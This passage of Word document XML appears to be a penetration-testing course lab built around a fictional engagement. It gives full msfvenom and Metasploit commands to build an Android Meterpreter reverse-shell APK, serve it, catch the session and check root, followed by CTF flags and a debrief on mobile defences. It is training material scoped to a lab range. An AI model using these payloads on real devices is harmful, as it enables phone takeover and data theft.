          </w:tcPr>
          <w:p w14:paraId="214102F8" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="243027"/>
              </w:rPr>
              <w:t>Case File — Cipher Logistics Engagement</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="561BB444" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>“Half of Cipher's staff do email on their phones,” Nadia says. “The board treats mobile as safe by default. Show them, mechanically, how one sideloaded app hands an attacker the device — so the mobile-policy conversation is grounded in fact.”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FDF7C2D" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>She sets the boundary. “This runs against a lab Android instance we control, inside the range. Same toolkit criminals use; authorization and scope are the only difference.”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BABC4A2" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Your task: build an Android payload, deliver it to the lab device, catch the session, and operate on it within scope.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CB90138" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. Lab Activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40709856" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>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14:paraId="3A90F0A9" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
        </w:rPr>
        <w:t>6A — Guided Lab (follow along, then practice)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656D5FEE" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Work through these steps on the attacker; the commands are given. Read each “Expected” line to confirm you are on track, then complete the Practice task on your own.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300613D0" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>1. Build the malicious APK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7432F10B" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.0.10 LPORT=4444 -o /root/evil.apk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61563512" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: evil.apk written.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433ED9F7" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>2. Host it for the device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3CBE2F" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cd /root &amp;&amp; python3 -m http.server 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E58E8A9" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: the APK available over HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E2A88F" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>3. Start the handler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196957E2" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set LHOST 10.10.0.10; set LPORT 4444; run'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795D3C16" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: the handler listening on 4444.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D700AC" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>4. Install and run the APK on the lab Android device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B417085" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t># on the device: download http://10.10.0.10:8080/evil.apk, allow unknown sources, install, open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58867455" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: a Meterpreter session opening on the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3929CECD" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>5. Confirm access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EF53DC" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F70DA0A" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>check_root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0769978A" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: device model/OS and root status — proof of control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E73DCE" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t xml:space="preserve">Practice: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>List the exact point in this chain where each mobile control (unknown-sources block, app vetting, MDM) would have stopped you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3AFC46" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
        </w:rPr>
        <w:t>6B — Unguided Lab (objectives + hints)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ECED9C" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Same lab, less scaffolding. These are objectives, not a script — work them in a sensible order, reach for the hint box only when stuck, and be ready to explain why each step works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53644DE4" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>1. Range note: the base TCL range has no mobile target. Add an Android instance (e.g. Android-x86 or an emulator) on the 10.30.0.x network and record its IP, or run the attacker steps and catch the session from an authorized test device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0D03F6" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. On the attacker, build an Android payload APK with msfvenom, setting LHOST to the attacker (10.10.0.10) and an LPORT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705DCFED" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>3. Host the APK (Metasploit web server or python3 -m http.server) so the device can download it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FEB5F3" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>4. Start a multi/handler for the android/meterpreter payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B97190D" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>5. On the lab Android device, download and install the APK (enable unknown-sources for the test), then open it to trigger the session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA8BF2C" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>6. In the Meterpreter session, enumerate the device (sysinfo), collect a benign artifact to prove access, and review what post-exploitation is possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABABE57" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>7. Write up the mobile defenses (app vetting, Play Protect, no sideloading, MDM) that would have blocked this.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9540"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA5F09" w14:paraId="22933EE5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEE7F1"/>
          </w:tcPr>
          <w:p w14:paraId="69251B1F" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="243027"/>
              </w:rPr>
              <w:t>Hints (not full answers)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F8E5658" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.0.10 LPORT=4444 -o evil.apk. Handler: use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set LHOST 10.10.0.10; set LPORT 4444; run. Serve the APK over HTTP; install on the lab device (allow unknown sources for the test only). Android Meterpreter: sysinfo, check_root, dump_* commands — use only benign proof on a device you own.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05E09144" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
        </w:rPr>
        <w:t>6C — Capture the Flag (no instructions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1331886A" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Show how one sideloaded app owns a phone. Lab Android device only, inside the range.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3180"/>
        <w:gridCol w:w="3180"/>
        <w:gridCol w:w="3180"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA5F09" w14:paraId="4272E915" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="6E4B1283" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="51121AC8" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Pts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="3E9A59C6" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Capture this</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA5F09" w14:paraId="3B3EDC02" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D649089" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Flag 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2609C3AB" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FA4402D" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>The payload type used to compromise the device.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA5F09" w14:paraId="37A905C8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="758B1483" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Flag 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="739ED2FB" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F10EEE1" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>The device's model/OS from sysinfo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA5F09" w14:paraId="10CBD9AC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A4F8D8A" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Flag 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08F5D6B4" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A3A7CA0" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Two mobile controls that would have blocked the install, and where in the chain.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="776A6343" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Total: 50 points. Submit each flag's value with one screenshot showing how you captured it. Any tool or method is allowed — but every target stays inside the 10.30.0.0/24 range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476F01FE" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00EA5F09">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08AC4278" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Debrief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537EBD39" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>A mobile compromise follows the same arc as a desktop one — payload, delivery, session, post-exploitation — but the delivery relies on a human sideloading an app. That's why mobile defense is layered on the install path: block unknown sources, vet apps, enforce MDM policy, and educate users. The demonstrated session is what turns ‘mobile is risky’ into a budget line.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402E266C" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>7. Deliverable: Screenshots &amp; Brief Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4584DA98" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Submit the following as a single PDF or document, in order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C2DF80" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Screenshot of your msfvenom APK build.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1304E2A8" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Screenshot of the multi/handler catching the Android session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D780080" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Screenshot of a Meterpreter command proving access (sysinfo) on the lab device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB8148D" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• A brief report on the attack path and the mobile controls you'd recommend to Helen Cho.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F94E33" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Terminal Activity Log: on the attacker container, run  history 10 &gt; lab25.txt , then last -n 10 &gt;&gt; lab25.txt , then  cat lab25.txt  — screenshot the output of that final cat command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E39C05C" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8. Additional Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68956E59" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Up to five curated resources for this lab, including video walkthroughs where useful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B73FDF" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
